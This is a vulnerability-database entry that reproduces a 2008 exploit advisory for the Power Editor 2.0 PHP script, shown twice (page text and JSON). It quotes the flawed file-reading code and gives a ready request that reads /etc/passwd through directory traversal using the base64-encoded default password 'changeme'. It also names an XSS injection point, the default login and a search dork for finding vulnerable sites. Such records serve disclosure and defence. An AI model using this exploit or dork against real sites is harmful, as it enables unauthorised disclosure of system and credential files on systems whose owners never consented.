Search...

Power Editor 2.0 - Remote File Disclosure / Edit Vulnerability

2014-07-01T00:00:00

ID SSV:65374
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                	     ########################################################################
             #                                                                      #
             #    ..:::::Power Editor LOCAL FILE INCLUSION Vulnerbility ::::...     #           
             ########################################################################

Virangar Security Team

www.virangar.net

--------
Discoverd By :Virangar Security Team (hadihadi)

special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra

& all virangar members & all iranian hackerz

greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal) from emperor team :)
-----------------------------------
download:http://www.scriptsez.net/index.php?action=details&cat=Content%20Management&id=1063623812
dork: Powered By Power Editor
-----------------------------------
vuln code in editor.php:
line 84-94:
if ($action==&#34;tempedit&#34;) {
$n=base64_decode($m);    
if ($n==$password){
template();
$te=$HTTP_GET_VARS[&#39;te&#39;];
$dir=$HTTP_GET_VARS[&#39;dir&#39;];
$filename = &#34;$dir/$te&#34;;
$fd = fopen ($filename, &#34;r&#34;);
$stuff = fread ($fd, filesize ($filename));
fclose ($fd);
?&#62;
-------
vuln:
http://site.com/editor.php?action=tempedit&m=[base64 password]&te=[local_file]&dir=[local_dir]
examp:
editor.php?action=tempedit&m=Y2hhbmdlbWU=&te=/etc/passwd&dir=../../../../../../../../../..

-------------------------------------
and xss here :D :
http://site.com/editor.php?action=tempedit&m=[base64 password]&te=[xss]&dir=[xss]
-----
note:
default pass for login is:changeme
-----
young iranian h4ck3rz
/* tnx 2:
st0rke,aria-security.net,r00tshell.org,all h4ck3rz */

# milw0rm.com [2008-05-05]

JSON Vulners Source

Initial Source

{"href": "https://www.seebug.org/vuldb/ssvid-65374", "status": "cve,poc", "bulletinFamily": "exploit", "modified": "2014-07-01T00:00:00", "title": "Power Editor 2.0 - Remote File Disclosure / Edit Vulnerability", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-65374", "cvelist": [], "description": "No description provided by source.", "viewCount": 2, "published": "2014-07-01T00:00:00", "sourceData": "\n \t ########################################################################\r\n # #\r\n # ..:::::Power Editor LOCAL FILE INCLUSION Vulnerbility ::::... # \r\n ########################################################################\r\n\r\nVirangar Security Team\r\n\r\nwww.virangar.net\r\n\r\n--------\r\nDiscoverd By :Virangar Security Team (hadihadi)\r\n\r\nspecial tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra\r\n\r\n& all virangar members & all iranian hackerz\r\n\r\ngreetz:to my best friend in the world hadi_aryaie2004\r\n& my lovely friend arash(imm02tal) from emperor team :)\r\n-----------------------------------\r\ndownload:http://www.scriptsez.net/index.php?action=details&cat=Content%20Management&id=1063623812\r\ndork: Powered By Power Editor\r\n-----------------------------------\r\nvuln code in editor.php:\r\nline 84-94:\r\nif ($action=="tempedit") {\r\n$n=base64_decode($m); \r\nif ($n==$password){\r\ntemplate();\r\n$te=$HTTP_GET_VARS['te'];\r\n$dir=$HTTP_GET_VARS['dir'];\r\n$filename = "$dir/$te";\r\n$fd = fopen ($filename, "r");\r\n$stuff = fread ($fd, filesize ($filename));\r\nfclose ($fd);\r\n?>\r\n-------\r\nvuln:\r\nhttp://site.com/editor.php?action=tempedit&m=[base64 password]&te=[local_file]&dir=[local_dir]\r\nexamp:\r\neditor.php?action=tempedit&m=Y2hhbmdlbWU=&te=/etc/passwd&dir=../../../../../../../../../..\r\n\r\n-------------------------------------\r\nand xss here :D :\r\nhttp://site.com/editor.php?action=tempedit&m=[base64 password]&te=[xss]&dir=[xss]\r\n-----\r\nnote:\r\ndefault pass for login is:changeme\r\n-----\r\nyoung iranian h4ck3rz\r\n/* tnx 2:\r\nst0rke,aria-security.net,r00tshell.org,all h4ck3rz */\r\n\r\n# milw0rm.com [2008-05-05]\r\n\n ", "id": "SSV:65374", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T14:52:09", "reporter": "Root", "enchantments": {"score": {"value": -0.3, "vector": "NONE", "modified": "2017-11-19T14:52:09", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T14:52:09", "rev": 2}, "vulnersScore": -0.3}, "references": []}